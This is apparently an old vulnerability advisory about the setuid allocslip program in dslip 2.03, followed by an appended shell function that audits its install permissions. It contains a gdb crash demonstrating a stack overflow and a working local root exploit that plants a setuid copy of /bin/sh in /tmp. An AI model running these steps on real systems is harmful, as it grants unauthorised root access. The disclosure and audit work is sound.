allocslip (dslip)

    CyberPsychotic found the following.  allocslip is part of the dslip
    package and it has an overflow in it (since it's setuid, it should
    bring a rootshell with a careful exploit).  Here's how it was

       package Dslip, version 2.03

        gdb allocslip

        GDB is free software and you are welcome to distribute copies of it
         under certain conditions; type "show copying" to see the conditions.
        There is absolutely no warranty for GDB; type "show warranty" for details.
        GDB 4.16 (i586-unknown-linux), Copyright 1996 Free Software Foundation,
        Inc... (no debugging symbols found)...
        (gdb) run b_s `perl -e ' printf "A" x 300'` [usual GDB messages]
        not found
        Program received signal SIGSEGV, Segmentation fault.
         0x41414141 in ?? ()

    Info registers shows:

        ebp 0x41414141 0x41414141
        esi 0x40001fb0 1073749936
        edi 0x80487f8 134514680
        eip 0x41414141 0x41414141

    Obviously the stack is smashed.  David Kopstain added the following.
    In the README file for the dslip package, it clearly states:

        Those people  who are  allowed to  turn on  and off SLIP lines
        should be  put in  the slip  group.   NOBODY except  user slip
        should be allowed  in the slipown  group since it  effectively
        allows root access (since  the dialin/dialout scripts must  be
        run as  root).   The package  advises to  install the  program
        'allocslip' like so:

        -rwsr-x---   1 root     slipown      9220 Aug  4 11:15 allocslip*

    If you follow the instructions, then only users in group slipown
    can run this program and you're only at _their_ mercy.  But if you
    allow anyone to run this program on your machine, and it's setuid
    root like advised, then something as easy as this will compromise

        cat > /tmp/sg << EOF
        cp /bin/sh /tmp/tz
        chown root /tmp/tz
        chmod 4755 /tmp/tz
        EOF
        chmod +x /tmp/sg
        allocslip /tmp/sg

    allocslip simply follows any command you give it as arg 1.  So take
    the above shell script, run it, then look for your handy root
    shell at /tmp/tz.  The buffer overflow previously mentioned is of
    no real concern then, since we can already execute whatever we
    want.  And the reason some people can't make this program do
    exactly what they want (i.e. call system_script() so they can
    execute whatever they want) is because they must have compiled
    in the slip option in the networking options of the kernel.
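    As an added check (not part of the original report or the dslip
    package): a small POSIX sh function that audits the `ls -l` line of
    an installed allocslip against the README's recommended install mode
    above, i.e. owner root, group slipown, setuid, and no access at all
    for other users.  The install path in the usage comment is an
    assumption.

```shell
#!/bin/sh
# Audit one `ls -l` line for allocslip against the README advice
# (-rwsr-x--- root slipown).  Prints each deviation it finds and
# returns 0 only when the line matches that advice.
audit_allocslip_line() {
    line=$1
    set -- $line                 # fields: mode links owner group size ...
    mode=$1; owner=$3; group=$4
    rc=0

    # Owner must be root: the setuid bit hands out the owner's privilege.
    [ "$owner" = "root" ] || { echo "owner is '$owner', expected root"; rc=1; }

    # Only members of slipown are supposed to be able to run it.
    [ "$group" = "slipown" ] || { echo "group is '$group', expected slipown"; rc=1; }

    # Owner bits: the README expects a setuid root binary (-rws......).
    case $mode in
        -rws*) ;;
        -rwx*) echo "setuid bit not set in '$mode'"; rc=1 ;;
        *)     echo "unexpected owner bits in '$mode'"; rc=1 ;;
    esac

    # Group bits (characters 5-7) should be r-x for the slipown group.
    grp=$(printf '%s' "$mode" | cut -c5-10 | cut -c1-3)
    [ "$grp" = "r-x" ] || { echo "group bits are '$grp', expected r-x"; rc=1; }

    # Other bits (characters 8-10): any bit here lets every local user
    # run the program, which is exactly the situation the report warns about.
    other=$(printf '%s' "$mode" | cut -c8-10)
    [ "$other" = "---" ] || { echo "world-accessible: other bits are '$other', expected ---"; rc=1; }

    return $rc
}

# Live check against an installed copy (path is an assumption):
# audit_allocslip_line "$(ls -l /usr/sbin/allocslip)"
```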


    Read the manual.  Don't be a dumbshit and install software without
    reading exactly what you're doing.